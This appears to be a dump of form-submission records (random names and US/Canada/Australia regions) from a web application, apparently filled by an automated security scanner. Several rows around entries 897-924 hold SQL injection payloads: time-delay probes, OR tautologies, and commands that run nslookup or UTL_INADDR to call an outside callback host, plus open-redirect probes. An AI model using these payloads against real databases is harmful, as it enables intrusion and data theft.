 892. ualwjlgs, Canada Centre,
 893. fjiufdkm, North-Eastern US,
 894. orrilrkr, Australia Centre,
 895. fjiufdkm, North-Eastern US,
 896. 983', Mid-Southern US,
 897. etdyllec';copy (select '') to program 'nslookup dns.sqli.37203.21-726.21.84109.1.bxss.me, Mid-Southern US,
 898. '||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-725.21.84109.1.bxss'||'.me')||', Mid-Southern US,
 899. 3mx1M3ws'));select pg_sleep(18); -- , Mid-Southern US,
 900. Os3frXD8');select pg_sleep(18); -- , Mid-Southern US,
 901. orrilrkr, Southern US,
 902. S4WQejjZ';select pg_sleep(18); -- , Mid-Southern US,
 903. orrilrkr, Southern US,
 904. eliMM7C5'; waitfor delay '0:0:9' -- , Mid-Southern US,
 905. 1 waitfor delay '0:0:9' -- , Mid-Southern US,
 906. ualwjlgs, /www.vulnweb.com,
 907. (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/, Mid-Southern US,
 908. ualwjlgs, //www.vulnweb.com,
 909. ualwjlgs, http://www.vulnweb.com,
 910. if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/, Mid-Southern US,
 911. orrilrkr, South-Western US,
 912. -1" OR 2+929-929-1=0+0+0+1 -- , Mid-Southern US,
 913. ualwjlgs, 993419,
 914. -1' OR 2+170-170-1=0+0+0+1 or 'OyaNpxwp'=', Mid-Southern US,
 915. orrilrkr, South-Western US,
 916. ualwjlgs, /www.vulnweb.com,
 917. fjiufdkm, Mid-Southern US,
 918. -1' OR 2+814-814-1=0+0+0+1 -- , Mid-Southern US,
 919. qrptiygk, South-Eastern US,
 920. ''"", North-Eastern US,
 921. -1 OR 2+180-180-1=0+0+0+1, Mid-Southern US,
 922. fjiufdkm, Mid-Southern US,
 923. qrptiygk, South-Eastern US,
 924. -1 OR 2+626-626-1=0+0+0+1 -- , Mid-Southern US,
 925. fjiufdkm, Mid-Southern US,
 926. '", North-Eastern US,
 927. JyI=, North-Eastern US,
 928. vICYcqym, Mid-Southern US,
 929. qrptiygk, South-Eastern US,
 930. fjiufdkm, Mid-Southern US,
 931. orrilrkr, South-Eastern US,
 932. etdyllec, Mid-Southern US,
 933. qrptiygk, South-Eastern US,
 934. @@29Byb, North-Eastern US,
 935. orrilrkr, South-Eastern US,
 936. etdyllec, Mid-Southern US,
 937. 1%2527%2522, North-Eastern US,
 938. qrptiygk, South-Eastern US,
 939. 1'", North-Eastern US,
 940. aseyvrtr, North-Eastern US,
 941. orrilrkr, North-Western US,
 942. fjiufdkm, Canada Centre,
 943. orrilrkr, North-Western US,
 944. /www.vulnweb.com, Australia Centre,
 945. fjiufdkm, Canada Centre,
 946. //www.vulnweb.com, Australia Centre,
 947. fjiufdkm, Canada Centre,
 948. vioqhgfh, Mid-Southern US,
 949. http://www.vulnweb.com, Australia Centre,
 950. fjiufdkm, Canada Centre,
 951. 996588, Australia Centre,
 952. /www.vulnweb.com, Australia Centre,
 953. vioqhgfh, Mid-Southern US,
 954. qrptiygk, North-Western US,
 955. orrilrkr, North-Eastern US,
 956. qrptiygk, North-Western US,
 957. orrilrkr, North-Eastern US,
 958. vioqhgfh, Mid-Southern US,
 959. vioqhgfh, Mid-Southern US,
 960. qrptiygk, North-Western US,
 961. vioqhgfh, Mid-Southern US,
 962. qrptiygk, North-Western US,
 963. vioqhgfh, Mid-Southern US,
 964. qrptiygk, North-Western US,
 965. vioqhgfh, Mid-Southern US,
 966. fjiufdkm, KyTenGoiVBQT.php/.,
 967. fjiufdkm, KyTenGoiVBQT.php,
 968. orrilrkr, Mid-Southern US,
 969. fjiufdkm, KyTenGoiVBQT.php,
 970. orrilrkr, Mid-Southern US,
 971. fjiufdkm, Canada%20Centre,
 972. ''"", Mid-Southern US,
 973. /www.vulnweb.com, Southern US,
 974. '", Mid-Southern US,
 975. //www.vulnweb.com, Southern US,
 976. JyI=, Mid-Southern US,
 977. @@5iFSR, Mid-Southern US,
 978. orrilrkr, Canada Centre,
 979. http://www.vulnweb.com, Southern US,
 980. 1%2527%2522, Mid-Southern US,
 981. orrilrkr, Canada Centre,
 982. vioqhgfh, Canada Centre,
 983. 903491, Southern US,
 984. 1'", Mid-Southern US,
 985. vioqhgfh, Canada Centre,
 986. /www.vulnweb.com, Southern US,
 987. vioqhgfh, Canada Centre,
 988. aseyvrtr, Mid-Southern US,
 989. qrptiygk, North-Eastern US,
 990. KyTenGoiVBQT.php/., Australia Centre,
 991. qrptiygk, North-Eastern US,
 992. qrptiygk, North-Eastern US,
 993. orrilrkr,